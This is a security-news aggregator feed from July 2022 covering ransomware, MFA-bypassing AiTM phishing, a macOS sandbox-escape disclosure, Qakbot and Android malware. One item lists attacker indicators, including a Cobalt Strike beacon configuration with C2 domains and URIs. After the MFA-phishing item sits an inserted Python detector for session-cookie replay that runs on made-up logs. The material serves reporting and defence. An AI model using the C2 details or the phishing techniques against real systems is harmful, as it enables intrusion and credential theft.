                51% of industrial organizations believe that the number of cyber attacks on smart factories is likely to increase over the next 12 months, according to the Capgemini Research Institute. Yet, 47% of manufacturers say cybersecurity in their smart factories is not a C-level concern. This Help Net Security video shows why smart factories need to prioritize their cybersecurity.

                The post Smart factories need to prioritize their cybersecurity appeared first on Help Net Security.

                "



                Pakistani Hackers Targeting Indian Students in Latest Malware Campaign

                exploits
                2022-07-14 https://thehackernews.com/2022/07/pakistani-hackers-targeting-indian.html
                The advanced persistent threat (APT) group known as Transparent Tribe has been attributed to a new ongoing phishing campaign targeting students at various educational institutions in India at least since December 2021. "This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users," Cisco Talos said in a report shared with The Hacker News.



                Microsoft published exploit code for a macOS App sandbox escape flaw

                exploits
                2022-07-14 https://securityaffairs.co/wordpress/133211/hacking/macos-sandbox-bypass-exploit.html

                Microsoft published the exploit code for a vulnerability in macOS that can allow an attacker to escape the sandbox. Microsoft publicly disclosed technical details for an access issue vulnerability, tracked as CVE-2022-26706, that resides in the macOS App Sandbox. “Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape the App Sandbox and run unrestricted […]

                The post Microsoft published exploit code for a macOS App sandbox escape flaw appeared first on Security Affairs.

                "

                Autosummary: In one of the hacking attempts, the researchers created a proof-of-concept (PoC) that used the -stdin option of the open command on a Python file to bypass the “com.apple.quarantine” extended attribute restriction. The researchers also developed a shortened version of the exploit code that can be included in a Twitter post.


                State-Backed Hackers Targeting Journalists in Widespread Espionage Campaigns

                government
                2022-07-14 https://thehackernews.com/2022/07/state-backed-hackers-targeting.html
                Nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware as part of a series of campaigns since early 2021. "Most commonly, phishing attacks targeting journalists are used for espionage or to gain key insights into the inner workings of another government, company, or other area of state-designated



                Microsoft Details App Sandbox Escape Bug Impacting Apple iOS, iPadOS, macOS Devices

                exploits
                2022-07-14 https://thehackernews.com/2022/07/microsoft-details-app-sandbox-escape.html
                Microsoft on Wednesday shed light on a now patched security vulnerability affecting Apple’s operating systems that, if successfully exploited, could allow attackers to escalate device privileges and deploy malware. "An attacker could take advantage of this sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing additional



                PayPal phishing kit added to hacked WordPress sites for full ID theft

                financial
                2022-07-14 https://www.bleepingcomputer.com/news/security/paypal-phishing-kit-added-to-hacked-wordpress-sites-for-full-id-theft/
                A newly discovered phishing kit targeting PayPal users is trying to steal a large set of personal information from victims that includes government identification documents and photos. [...]

                Autosummary: [Figure: Warning about unusual account activity (Akamai)] In a subsequent page, the victim is asked to provide a host of personal and financial details that include payment card data along with the card verification code, physical address, social security number, mother’s maiden name. [Figure: Bogus CAPTCHA step on the phishing site (Akamai)] After this stage, the victim is asked to log into their PayPal account using their email address and password, which are automatically delivered to the threat actor.


                Elden Ring maker Bandai Namco hit by ransomware and data leaks

                exploits ransomware
                2022-07-14 https://blog.malwarebytes.com/ransomware/2022/07/elden-ring-maker-bandai-namco-hit-by-ransomware-and-data-leaks/

                We take a look at a major ransomware attack impacting video game giant Bandai Namco, laced with the potential threat of data leakage.

                The post Elden Ring maker Bandai Namco hit by ransomware and data leaks appeared first on Malwarebytes Labs.

                "

                Autosummary: Eurogamer published a Bandai Namco statement, which reads as follows: On 3rd July, 2022, Bandai Namco Holdings Inc. confirmed that it experienced an unauthorised access by third party to the internal systems of several Group companies in Asian regions (excluding Japan). In addition, there is a possibility that customer information related to the Toys and Hobby Business in Asian regions (excluding Japan) was included in the servers and PCs, and we are currently identifying the status about existence of leakage, scope of the damage, and investigating the cause.


                New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs

                exploits
                2022-07-14 https://blog.malwarebytes.com/android/2022/07/new-variant-of-android-spyjoker-malware-removed-from-play-store-after-3-million-installs/

                A researcher found eight malware-laden apps in the Play Store which have been downloaded over 3 million times.

                The post New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs appeared first on Malwarebytes Labs.

                "

                Autosummary: Malicious apps. BleepingComputer posted the list of malicious apps found by Maxime Ingrao, which users may still have installed:
                - Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads
                - Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads
                - Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads
                - Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads
                - Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads
                - Coco Camera v1.1 (com.toomore.cool.camera) – 1,000 downloads
                - Funny Camera by KellyTech – 500,000 downloads
                - Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads
                Pradeo researchers have also identified four new malicious applications that embed the Joker malware:
                - Smart SMS Messages – 50.000+ installs
                - Blood Pressure Monitor – 10.000+ installs
                - Voice Languages Translator – 10.000+ installs
                - Quick Test SMS – 10.000+ installs
                How to avoid toll fraud malware: users that have any of the listed apps installed are advised to remove them as soon as possible. Also, always keep an eye on your background internet data, battery consumption, phone invoices, and bank statements, just in case.


                10,000 organisations targeted by phishing attack that bypasses multi-factor authentication

                financial
                2022-07-14 https://www.tripwire.com/state-of-security/featured/10000-organisations-targeted-by-phishing-attack-that-bypasses-multi-factor-authentication/
                Microsoft has shared details of a widespread phishing campaign that not only attempted to steal the passwords of targeted organisations, but was also capable of circumventing multi-factor authentication (MFA) defences. Read more in my article on the Tripwire State of Security blog.

                Autosummary: These include enabling conditional access policies (for instance, testing that logins are coming from trusted IP addresses and compliant devices), the deployment of anti-phishing defences at the email and web gateways, and detection of unusual mailbox activity (such as the creation of suspicious inbox rules, and logins with unusual characteristics).


                Holy Ghost ransomware operation linked to North Korean hackers

                exploits ransomware
                2022-07-14 https://www.bleepingcomputer.com/news/security/holy-ghost-ransomware-operation-linked-to-north-korean-hackers/
                For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries. [...]

                Autosummary: Microsoft tracks the newer variants as SiennaBlue (HolyRS.exe, HolyLocker.exe, and BTLC.exe) and notes that their functionality expanded over time to include multiple encryption options, string obfuscation, public key management, and internet/intranet support.


                Cyble partners with VirusTotal to protect customers’ digital assets from targeted cyberattacks

                ciber
                2022-07-14 https://www.helpnetsecurity.com/2022/07/15/cyble-virustotal/

                Cyble announced that it is now a credible source in the list of key contributors to VirusTotal‘s risk analysis. Being a part of VT’s list of website/domain scanning engine contributors will allow Cyble to extend its threat research even beyond its client base and serve the entire cybersecurity fraternity at large. Owned by Chronicle – a subsidiary of Alphabet Inc. (Google), VirusTotal offers threat research insights and reputation data to foster the analysis of suspicious … More

                The post Cyble partners with VirusTotal to protect customers’ digital assets from targeted cyberattacks appeared first on Help Net Security.

                "

                Autosummary: With proprietary threat hunting models based on a combination of big data, ML+AI, and state-of-the-art threat research, Cyble alerts its users with sufficient context to understand cyber risks and prioritize them through real-time alerts and meaningful threat intelligence.


                Microsoft links Holy Ghost ransomware operation to North Korean hackers

                exploits ransomware
                2022-07-14 https://www.bleepingcomputer.com/news/security/microsoft-links-holy-ghost-ransomware-operation-to-north-korean-hackers/
                For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries. [...]

                Autosummary: Microsoft tracks the newer variants as SiennaBlue (HolyRS.exe, HolyLocker.exe, and BTLC.exe) and notes that their functionality expanded over time to include multiple encryption options, string obfuscation, public key management, and internet/intranet support.


                The enemy of vulnerability management? Unrealistic expectations

                exploits
                2022-07-13 https://www.helpnetsecurity.com/2022/07/13/vulnerability-management-expectations/

                Organizations vary by size, industry, level of maturity, but one thing that they all have in common is needing to know how to quickly remediate security vulnerabilities. As an experienced vulnerability management professional and a former system administrator who specialized in patching and remediated 800,000 vulnerabilities over the course of my career, I can offer some realistic perspective on this topic. One reoccurring discussion I’ve had is how long it takes for a new vulnerability … More

                The post The enemy of vulnerability management? Unrealistic expectations appeared first on Help Net Security.

                "

                Autosummary: You can get into that range by setting due dates of 30, 60, 90, and 180 days for severities of critical, high, medium, and low, respectively. When it comes to how quickly to patch, I can talk about what the rest of the industry does, what the US government recommends, and what works from a system administrator perspective. Organizations vary by size, industry, level of maturity, but one thing that they all have in common is needing to know how to quickly remediate security vulnerabilities.


                Researchers Uncover New Attempts by Qakbot Malware to Evade Detection

                exploits
                2022-07-13 https://thehackernews.com/2022/07/researchers-uncover-new-attempts-by.html
                The operators behind the Qakbot malware are transforming their delivery vectors in an attempt to sidestep detection. "Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot," Zscaler Threatlabz



                Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout

                exploits
                2022-07-13 https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html
                Microsoft released its monthly round of Patch Tuesday updates to address 84 new security flaws spanning multiple product categories, counting a zero-day vulnerability that’s under active attack in the wild. Of the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are two other bugs in the Chromium-based Edge browser, one

                Autosummary: Rounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service (CVE-2022-30216) and Microsoft Defender for Endpoint (CVE-2022-33637) and three denial-of-service (DoS) flaws in Internet Information Services (CVE-2022-22025 and CVE-2022-22040) and Security Account Manager (CVE-2022-30208).


                Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021

                financial
                2022-07-13 https://securityaffairs.co/wordpress/133154/hacking/aitm-phishing-campaigns.html

                A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations. Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim has enabled MFA. In AiTM phishing, threat actors set up a proxy […]

                The post Large-scale AiTM phishing campaign targeted +10,000 orgs since 2021 appeared first on Security Affairs.

                "

                Autosummary: A large-scale phishing campaign used adversary-in-the-middle (AiTM) phishing sites to hit more than 10,000 organizations. Microsoft observed a large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user’s sign-in session, and bypass the authentication process even when the victim has enabled MFA.


                Rise in ransomware drives IT leaders to implement data encryption

                exploits ransomware
                2022-07-13 https://www.helpnetsecurity.com/2022/07/13/implement-data-encryption-video/

                The number of UK organizations implementing data encryption as a core part of their cybersecurity strategy has continued to rise, with 32% introducing a policy to encrypt all corporate information as standard in the last year. In total, 47% now require the encryption of all data, whether it’s at rest or in transit, according to Apricorn. This Help Net Security video highlights how remote working and rise in ransomware drive IT leaders to manage risk … More

                The post Rise in ransomware drives IT leaders to implement data encryption appeared first on Help Net Security.

                "



                Researchers Uncover New Variants of the ChromeLoader Browser Hijacking Malware

                exploits
                2022-07-13 https://thehackernews.com/2022/07/researchers-uncover-new-variants-of.html
                Cybersecurity researchers have uncovered new variants of the ChromeLoader information-stealing malware, highlighting its evolving feature set in a short span of time. Primarily used for hijacking victims’ browser searches and presenting advertisements, ChromeLoader came to light in January 2022 and has been distributed in the form of ISO or DMG file downloads advertised via QR codes on Twitter



                Update now—July Patch Tuesday patches include fix for exploited zero-day

                exploits
                2022-07-13 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/

                July’s Patch Tuesday gives us a lot of important security updates. Most prominently, a known to be exploited vulnerability in Windows CSRSS.

                The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

                "

                Autosummary: Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates. Adobe released security updates for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.


                Microsoft Warns of Large-Scale AiTM Phishing Attacks Against Over 10,000 Organizations

                financial
                2022-07-13 https://thehackernews.com/2022/07/microsoft-warns-of-large-scale-aitm.html
                Microsoft on Tuesday disclosed that a large-scale phishing campaign targeted over 10,000 organizations since September 2021 by hijacking Office 365’s authentication process even on accounts secured with multi-factor authentication (MFA). "The attackers then used the stolen credentials and session cookies to access affected users’ mailboxes and perform follow-on business email compromise (BEC)

                Autosummary: The intrusions entailed setting up adversary-in-the-middle (AitM) phishing sites, wherein the adversary deploys a proxy server between a potential victim and the targeted website so that recipients of a phishing email are redirected to lookalike landing pages designed to capture credentials and MFA information.


                Large-Scale Phishing Campaign Bypasses MFA

                financial
                2022-07-13 https://threatpost.com/large-scale-hishing-bypasses-mfa/180212/
                Attackers used adversary-in-the-middle attacks to steal passwords, hijack sign-in sessions and skip authentication and then use victim mailboxes to launch BEC attacks against other targets.

                Autosummary: “While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie–and because the session cookie shows that MFA was already used to login–the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron, security awareness advocate at security awareness training firm KnowBe4, in an email to Threatpost. At this point, however, the attack does something unique using clever coding by automatically filling in the phishing landing page with the user’s email address, “thus enhancing its social engineering lure,” researchers noted.


                New Android malware on Google Play installed 3 million times

                exploits
                2022-07-13 https://www.bleepingcomputer.com/news/security/new-android-malware-on-google-play-installed-3-million-times/
                A new Android malware family on the Google Play Store that secretly subscribes users to premium services was downloaded over 3,000,000 times. [...]



                $8 million stolen in large-scale Uniswap airdrop phishing attack

                financial
                2022-07-13 https://www.bleepingcomputer.com/news/security/8-million-stolen-in-large-scale-uniswap-airdrop-phishing-attack/
                Uniswap, a popular decentralized cryptocurrency exchange, lost close to $8 million worth of Ethereum in a sophisticated phishing attack yesterday. [...]

                Autosummary: Lure tokens sent to thousands of users The goal was to re-direct the recipients to a scam website on the domain "uniswaplp[.]com," which impersonates the official Uniswap domain "uniswap.org." The operator appeared as "Uniswap V3: "


                Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

                ransomware
                2022-07-13 https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/

                While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.

                The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

                "

                Autosummary: Indicators of compromise:
                024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1
                14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea
                474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d
                Payloads:
                0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470
                aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a
                fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346
                501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff
                Cobalt Strike beacon and payloads:
                136.144.41[.]177
                syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/
                syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/
                skreatortemp[.]site
                imolaoggi[.]eu
                This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog (Figure 2: Detail of Vacancies and GoElephant dropper macros). In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls (Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros). The Help Ukraine lure, to our knowledge, has never been publicly documented before (Figure 4: Help Ukraine lure used in late July). We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack (Figure 5: Similarities between different versions). Also, in the past we have found comments regarding a domain named ExcelVBA[.]ru.
                This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:
                BeaconType – HTTPS
                Port – 443
                SleepTime – 30000
                PublicKey_MD5 – defb5d95ce99e1ebbf421a1a38d9cb64
                C2Server – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/
                UserAgent – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap
                HttpPostUri – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/
                Watermark – 1580103824
                By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.


                New Lilith ransomware emerges with extortion site, lists first victim

                exploits ransomware
                2022-07-13 https://www.bleepingcomputer.com/news/security/new-lilith-ransomware-emerges-with-extortion-site-lists-first-victim/
                A new ransomware operation has been launched under the name "Lilith," and it has already posted its first victim on a data leak site created to support double-extortion attacks. [...]

                Autosummary: A look at Lilith: upon execution, Lilith attempts to terminate processes that match entries on a hardcoded list, including Outlook, SQL, Thunderbird, Steam, PowerPoint, WordPad, Firefox, and more.


                Bandai Namco confirms hack after ALPHV ransomware data leak threat

                exploits ransomware
                2022-07-13 https://www.bleepingcomputer.com/news/security/bandai-namco-confirms-hack-after-alphv-ransomware-data-leak-threat/
                Game publishing giant Bandai Namco has confirmed that they suffered a cyberattack that may have resulted in the theft of customers’ personal data. [...]

                Autosummary: Bandai Namco is a Japanese publisher of numerous popular video games, including Elden Ring, Dark Souls, Pac-Man, Tekken, Gundam, Soulcalibur, and many more.


                Microsoft releases tweet-size exploit for macOS sandbox escape bug

                exploits
                2022-07-13 https://www.bleepingcomputer.com/news/security/microsoft-releases-tweet-size-exploit-for-macos-sandbox-escape-bug/
                On macOS systems that don’t have Apple’s recent security updates, a vulnerability identified as CVE-2022-26706 could help an attacker bypass sandbox restrictions to execute code with elevated privileges. [...]



                Ransomware rolled through business defenses in Q2 2022

                exploits
                2022-07-13 https://blog.malwarebytes.com/business/2022/07/ransomware-rolled-through-business-defenses-in-q2-2022/

                2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2.

                The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.
                Here’s how the top five industries ranked by number of ransomware attacks this spring:
                - Services: 171
                - Manufacturing: 76
                - Technology: 65
                - Utilities: 61
                - Retail: 50
                Top ransomware variants: LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place.
                Noteworthy March attacks: March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised.
                New ransomware trends: In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques.
                For ransomware reviews by the Malwarebytes Threat Intel team, check out the following: March ransomware review, April ransomware review, May ransomware review, June ransomware review. Be ready and resilient in advance of ransomware attacks.


                Collaboration and knowledge sharing key to progress in cybersecurity

                ciber
                2022-07-13 https://www.welivesecurity.com/2022/07/13/collaboration-knowledge-sharing-key-progress-cybersecurity/

                In a world of ever-evolving cyberthreats, collaboration and knowledge exchange are vital for keeping an edge on attackers

                The post Collaboration and knowledge sharing key to progress in cybersecurity appeared first on WeLiveSecurity

                "

                Autosummary: For example, disciplines such as threat intelligence process vast amounts of data to enhance security processes, platforms and open source development, using contributions and information provided by users, companies, government agencies, as well as efforts such as the MITRE ATT&CK framework, a knowledge bases that facilitates the exchange of information between organizations and researchers, and global conferences on cybersecurity that engage more and more people every year.Therefore, thinking of these new solutions from the security point of view will allow us to have more robust technology; as the human factor may not be removed, what we can do is minimize its impact,” adds Gutiérrez. "


                Qakbot operations continue to evolve to avoid detection

                ransomware
                2022-07-13 https://securityaffairs.co/wordpress/133191/malware/qakbot-continues-to-evolve.html

                Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns that insert replies into active email threads. The threat continues to […]

                The post Qakbot operations continue to evolve to avoid detection appeared first on Security Affairs.

                "

                Autosummary: “Other more subtle techniques are being deployed by threat actors to prevent automated detection and raise the odds that their attack will work, including obfuscating code, leveraging multiple URLs to deliver the payload, using unknown file extension names to deliver the payload, and altering the steps of the process by introducing new layers between initial compromise, delivery, and final execution.” "


                Microsoft releases PoC exploit for macOS sandbox escape vulnerability

                exploits
                2022-07-13 https://www.bleepingcomputer.com/news/security/microsoft-releases-poc-exploit-for-macos-sandbox-escape-vulnerability/
                On macOS systems that don't have Apple's recent security updates, a vulnerability identified as CVE-2022-26706 could help an attacker bypass sandbox restrictions to execute code with elevated privileges. [...]


                Insecure password leads to Mangatoon data breach

                financial
                2022-07-12 https://blog.malwarebytes.com/privacy-2/2022/07/insecure-password-leads-to-mangatoon-data-breach/

                Popular comics site Mangatoon has been breached due to a poorly secured database.

                The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.

                "

                Autosummary: You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.The breach exposed names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes. "


                UK government ministers urged to not conduct business using WhatsApp

                government
                2022-07-12 https://www.computerworld.com/article/3666734/uk-government-ministers-urged-to-not-conduct-business-using-whatsapp.html#tk.rss_security

                The UK’s Information Commissioner’s Office (ICO) has concluded its investigation into the government’s use of private communication channels and is now urging ministers to review how messaging apps and personal email accounts are being used to conduct official government business.

                A newly published report marks the conclusion of a year-long investigation launched in 2021 by then-Information Commissioner Elizabeth Denham. The inquiry was initiated after concerns were raised about the use of the messaging service WhatsApp and private email accounts by former health secretary Matt Hancock and his deputy, James Bethell, at the Department of Health and Social Care (DHSC) during the height of the pandemic.

                Autosummary: In his opening remarks, John Edwards, who took over the role of Information Commissioner from Denham in January 2022, said that while it was understandable that new technologies had been rolled out in an effort to keep departments functioning during the pandemic, “the deployment of these technologies failed to appreciate the risks and issues around the security of information and managing transparency obligations.”


                ‘Callback’ Phishing Campaign Impersonates Security Firms

                financial
                2022-07-12 https://threatpost.com/callback-phishing-security-firms/180182/
                Victims are instructed to make a phone call that will direct them to a link for downloading malware.

                Autosummary: Potential to spread ransomware: Researchers also assessed with “moderate confidence” that callback operators in the campaign “will likely use ransomware to monetize their operation,” as “2021 BazarCall campaigns would eventually lead to Conti ransomware,” they said.


                Microsoft July 2022 Patch Tuesday fixes exploited zero-day, 84 flaws

                exploits
                2022-07-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2022-patch-tuesday-fixes-exploited-zero-day-84-flaws/
                Today is Microsoft's July 2022 Patch Tuesday, and with it comes fixes for one actively exploited zero-day vulnerability and a total of 84 flaws. [...]


                Microsoft: Phishing bypassed MFA in attacks against 10,000 orgs

                financial
                2022-07-12 https://www.bleepingcomputer.com/news/security/microsoft-phishing-bypassed-mfa-in-attacks-against-10-000-orgs/
                Microsoft says a massive series of phishing attacks has targeted more than 10,000 organizations since September 2021, using the gained access to victims' mailboxes in follow-on business email compromise (BEC) attacks. [...]

                Autosummary: "A large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites stole passwords, hijacked a user's sign-in session, and skipped the authentication process even if the user had enabled multifactor authentication (MFA)," the Microsoft 365 Defender Research Team and Microsoft Threat Intelligence Center (MSTIC) said.
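
The session hijacking described above leaves a signature in sign-in telemetry: the AiTM proxy relays the victim's real sign-in (so MFA passes and a session is issued to the victim's IP), then presents the captured session from the attacker's own infrastructure, typically followed by mailbox tampering for the BEC stage. The detector below is an added example, not Microsoft's code and not part of the original article. It runs over constructed sign-in events (the pipe-separated format, field names, event names and addresses are all assumptions made for this example) and flags any session that was issued by an MFA-verified sign-in and is then presented from a different source IP within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in events (not real telemetry). Assumed format:
# timestamp | user | session_id | source_ip | event | mfa=<ok|n/a>
SAMPLE_LOG = """\
2022-07-12T09:00:05Z | alice@example.com | sess-7f3a | 203.0.113.10 | signin | mfa=ok
2022-07-12T09:01:40Z | alice@example.com | sess-7f3a | 198.51.100.77 | activity | mfa=n/a
2022-07-12T09:02:10Z | alice@example.com | sess-7f3a | 198.51.100.77 | mailbox_rule_created | mfa=n/a
2022-07-12T09:05:00Z | bob@example.com | sess-2c9e | 203.0.113.22 | signin | mfa=ok
2022-07-12T09:30:00Z | bob@example.com | sess-2c9e | 203.0.113.22 | activity | mfa=n/a
"""


def parse_line(line):
    """Split one constructed log line into a dict with a parsed timestamp."""
    ts, user, sid, ip, event, mfa = [f.strip() for f in line.split("|")]
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "user": user,
        "session": sid,
        "ip": ip,
        "event": event,
        "mfa": mfa.split("=", 1)[1],
    }


def detect_session_replay(log_text, window=timedelta(minutes=30)):
    """Return one alert per event in which a session issued by an MFA-backed
    sign-in is presented from a different IP within `window` of issuance.
    An AiTM proxy produces exactly this pattern: the sign-in (and MFA prompt)
    is relayed from the victim's IP, the stolen cookie is replayed elsewhere."""
    issued = {}   # session_id -> (user, issuing_ip, issue_time)
    alerts = []
    for raw in log_text.strip().splitlines():
        ev = parse_line(raw)
        if ev["event"] == "signin" and ev["mfa"] == "ok":
            issued[ev["session"]] = (ev["user"], ev["ip"], ev["ts"])
            continue
        origin = issued.get(ev["session"])
        if origin is None:
            continue                      # session not seen being issued
        user, issuing_ip, issued_at = origin
        if ev["ip"] != issuing_ip and ev["ts"] - issued_at <= window:
            alerts.append({
                "user": user,
                "session": ev["session"],
                "issued_from": issuing_ip,
                "replayed_from": ev["ip"],
                "event": ev["event"],
                "seconds_after_signin": int((ev["ts"] - issued_at).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_session_replay(SAMPLE_LOG):
        print(alert)
```

On the constructed log this raises two alerts for alice's session (first presented from 198.51.100.77 ninety-five seconds after an MFA sign-in from 203.0.113.10, then used to create a mailbox rule), and none for bob, whose session stays on one address. An IP change alone is noisy in real tenants (mobile carriers, VPNs), so in practice the rule is combined with ASN or geolocation distance and weighted by what the replayed session does; an inbox-rule creation minutes after a sign-in from a new network is the BEC follow-on the article describes. Detection is the fallback: the session cookie is still valid after MFA, so only origin-bound, phishing-resistant authenticators stop the relay in the first place.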


                CISA orders agencies to patch new Windows zero-day used in attacks

                exploits
                2022-07-12 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-new-windows-zero-day-used-in-attacks/
                CISA has added an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS) to its list of bugs abused in the wild. [...]


                Hackers impersonate cybersecurity firms in callback phishing attacks

                financial ciber
                2022-07-12 https://www.bleepingcomputer.com/news/security/hackers-impersonate-cybersecurity-firms-in-callback-phishing-attacks/
                Hackers are impersonating well-known cybersecurity companies, such as CrowdStrike, in callback phishing emails to gain initial access to corporate networks. [...]

                Autosummary: However, over the past year, threat actors have increasingly used "callback" phishing campaigns that impersonate well-known companies requesting you call a number to resolve a problem, cancel a subscription renewal, or discuss another issue.


                Microsoft fixes exploited zero-day in Windows CSRSS (CVE-2022-22047)

                exploits
                2022-07-12 https://www.helpnetsecurity.com/2022/07/12/cve-2022-22047/

                The July 2022 Patch Tuesday is upon us and has brought fixes for 84 CVEs in various Microsoft products, including an actively exploited zero-day: CVE-2022-22047, an elevation of privilege bug in Windows’ Client/Server Runtime Subsystem (CSRSS). “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft noted, but the attacker must first gain access to the system, usually by exploiting a separate code execution bug. Is it being used in widespread or targeted … More

                The post Microsoft fixes exploited zero-day in Windows CSRSS (CVE-2022-22047) appeared first on Help Net Security.

                "

                Autosummary: Other vulnerabilities to prioritize Dustin Childs, with Trend Micro’s Zero Day Initiative, says that CVE-2022-30216, a “tampering” vulnerability in the Windows Server Service that may allow an authenticated attacker to upload a malicious certificate to a target server, should be patched quickly on critical servers. "


                The President of European Central Bank Christine Lagarde targeted by hackers

                financial
                2022-07-12 https://securityaffairs.co/wordpress/133163/hacking/european-central-bank-hacking-attempt.html

                Christine Lagarde, the president of the European Central Bank (ECB), was the target of a failed hacking attempt. The ECB confirmed the attempt, revealing that it took place recently, but the good news is that its experts […]

                The post The President of European Central Bank Christine Lagarde targeted by hackers appeared first on Security Affairs.

                "

                Autosummary: "


                Microsoft fixes dozens of Azure Site Recovery privilege escalation bugs

                exploits
                2022-07-12 https://www.bleepingcomputer.com/news/security/microsoft-fixes-dozens-of-azure-site-recovery-privilege-escalation-bugs/
                Microsoft has fixed 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [...]

                Autosummary: Potential implications: By acquiring admin-level privileges on a target system, an attacker would be free to change the OS security settings, make changes to user accounts, access all files on the system without restrictions, and install additional software.


                Nearly all governmental websites serve cookies or third-party trackers

                government
                2022-07-11 https://www.helpnetsecurity.com/2022/07/11/governmental-websites-cookies-third-party-trackers/

